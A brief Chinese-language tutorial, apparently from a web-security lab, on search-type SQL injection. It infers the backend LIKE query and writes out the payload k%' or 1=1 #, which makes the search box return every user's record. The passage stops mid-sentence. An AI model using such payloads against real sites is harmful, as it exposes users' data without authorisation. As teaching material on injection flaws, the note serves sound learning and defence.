SQL注入-搜索型 输入k字段进行搜索发现出用户信息 通过上图搜索可以猜测的sql语句为 select 字段1,字段2 from 表名 where username like '%k%'; 在后台查询结果 select id,email from member where username like '%k%'; 通过以上猜测进行构造payload语句 like '%k%' or 1=1 #%'; 下面的payload语句构造完毕 k%' or 1=1 # 将payload输入搜索框会发现所有用户信息已出现 后台代理逻辑,通过前端传入参数